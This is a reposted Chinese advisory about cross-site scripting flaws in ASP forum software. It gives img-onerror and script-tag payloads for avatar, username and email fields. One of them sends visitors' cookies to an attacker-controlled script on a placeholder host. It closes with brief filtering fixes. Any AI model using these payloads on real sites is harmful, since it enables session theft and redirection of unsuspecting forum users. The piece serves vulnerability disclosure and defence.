[转载]ASP论坛跨站脚本执行漏洞

信息来源：黑基
  
　经过对国内多个ASPbbs.hackbase.com" target="_blank">论坛的研究，比较出名的我都测试过了，99.99%存在下列问题。下面是比较常见的，出现在动网bbs.hackbase.com" target="_blank">论坛，极限bbs.hackbase.com" target="_blank">论坛等。

问题一：
一般bbs.hackbase.com" target="_blank">论坛允许用户使用自己的个性图片，在个性图片或者其他可以进行输入的地方，输入下面script <IMG SRC="http://about:test"onerror="top.location.href=&#39;http://定向位置&#39;;"> 将能将用户的浏览器重定向。
<IMG SRC="http://about:test"onerror="this.src=&#39;http://somedomain.com/yourscript.php&#39;;">
此处, yourscript.php 是一个接收用户 cookie 的脚本，攻击者将能获得用户 Cookie。
以用户浏览器重定向为例，因为bbs.hackbase.com" target="_blank">论坛程序会在每个你发的tip上面以<img src=你的图片位置>，所以只需要在个性图片的位置中填写
"http://about:test"onerror="top.location.href=&#39;http://定向位置&#39;;"
或者
http://about:test"onerror="top.location.href=&#39;http://定向位置&#39;;
则浏览者在浏览所有你post的tip时浏览器就会被重定向到http://定向位置，至于获取用户cookies的方法也是一样的

问题二：
另外有部分ASPbbs.hackbase.com" target="_blank">论坛只要注册名字如<script>的用户，可以导致bbs.hackbase.com" target="_blank">论坛页面变形。
原理：没有对用户名字进行过滤，而一般bbs.hackbase.com" target="_blank">论坛都会在bbs.hackbase.com" target="_blank">论坛首页显示最新注册用户的名字，则该名字以一个变量的形势破坏整个页面。
利用：如果没有对用户名长度进行限制，可以实现上面所说的重定向浏览器和取得用户cookies。

问题三：
最后一个问题，就是第一个问题的延伸与利用。
由于程序本身不进行过滤，所以在其他一些填写用户信息的地方同样可以实现第一个攻击方法。
例如在填写email的位置填写<script>alert(&#39;fuck&#39;)</script>fuck@somedomain.com
如果不可信可以尝试><script>alert(&#39;fuck&#39;)</script>fuck@somedomain.com
同样的，在其他地方例如个人主页一样可以实现（我觉得这个是最好利用的，因为前面就已经会以a herf帮你提交）

解决办法:
1．对该几处设置进行过滤（建议使用）
2．对长度进行限制（不推荐）